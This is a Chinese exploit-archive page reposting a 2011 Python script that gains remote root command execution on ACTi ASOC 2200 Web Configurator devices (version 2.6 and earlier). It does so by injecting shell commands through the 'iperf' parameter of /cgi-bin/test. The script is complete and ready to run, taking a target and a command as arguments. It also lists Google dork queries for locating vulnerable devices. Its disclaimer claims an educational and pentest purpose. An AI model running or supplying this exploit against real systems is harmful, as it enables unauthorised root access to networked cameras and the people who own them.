首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
ACTi ASOC 2200 Web Configurator 2.6 Remote Root Command Execution
来源:b4ltazar@gmail.com 作者:b4ltazar 发布时间:2011-03-21   
#!/usr/bin/python
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will be not responsible for any damage!
# !!! Special greetz for my friend sinner_01 !!!
# Toolname        : actiroot.py
# Coder           : baltazar a.k.a b4ltazar < b4ltazar@gmail.com>
# Version         : 
# About           : ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution
# Greetz for rsauron and low1z, great python coders
# greetz for d3hydr8, qk, marezzi, StRoNiX, t0r3x, fx0, TraXdata, v0da  and all members of ex darkc0de.com, ljuska.org and rev3rse.org
# 
# 
# Example of use  : ./actiroot.py target cmd
# Based on http://packetstormsecurity.org/files/view/99414/actiasoc-exec.txt, so all credits go to original author ...

import sys, os, time, urllib2, re

if sys.platform == 'linux' or sys.platform == 'linux2':
	clearing = ' clear'
else:
	clearing = 'cls'
os.system(clearing)

R = "\033[31m";
G = "\033[32m";

def logo():
	print G+"\n|---------------------------------------------------------------|"
	print "|                                                               |"
        print "| b4ltazar[@]gmail[dot]com                                      |"
        print "|   03/2011     actiroot.py                                     |"
	print "| ACTi Corporation remote root                                  |"
        print "|                                                               |"
        print "|---------------------------------------------------------------|\n"
	print "\n[-] %s\n" % time.strftime("%X")
	
if len(sys.argv) != 3:
	logo()
	print "Usage: ./actiroot.py TARGET CMD"
	sys.exit(0)
	
target = sys.argv[1]
cmd = sys.argv[2]
logo()
exploit = "http://"+target+"/cgi-bin/test?iperf=;"+cmd+" &"
print G+"[+] ACTi ASOC 2200 Web Configurator <= v2.6 Remote Root Command Execution"
print "[+] Gd0rk: intitle:Web Configurator - Version v2.6"
print "           inurl:videoconfiguration.cgi"
print "[+] Target: ",target
print "[+] Command: ",cmd
print "[+] Exploit: ", exploit
print "[!] Trying to exploit ..."
print "[+] Please wait ..."

try:
	target = "http://"+target
	root = urllib2.urlopen(target+"/cgi-bin/test?iperf=;"+cmd)
	root = root.read()
	if re.findall("execute", root):
		print "[!] w00t,w00t!!! Exploit works ...\n"
		print R+root
		print G+"\n[!] Exiting ..."
	else:
		print "[-] Sorry, exploit failed !"
		print "\n[!] Exiting ..."
except(KeyboardInterrupt, SystemExit):
	pass

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Fake Webcam 6.1 Crash Proof Of
·SpoonFTP 1.2 Denial Of Service
·Ftpdmin 1.0 Denial Of Service
·MPlayer Lite r33064 m3u SEH Ov
·Mediacoder 2011 RC3 m3u Buffer
·RealPlayer <= 14.0.1.633 Heap
·libzip 0.9.3 _zip_name_locate
·Novell Netware NWFTPD.NLM DELE
·iCMS v1.1 Admin SQLi/Bruteforc
·SpoonFTP 1.2 RETR Denial of Se
·CORE Multimedia Suite 2011 COR
·POP Peeper 3.7 SEH Exploit
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved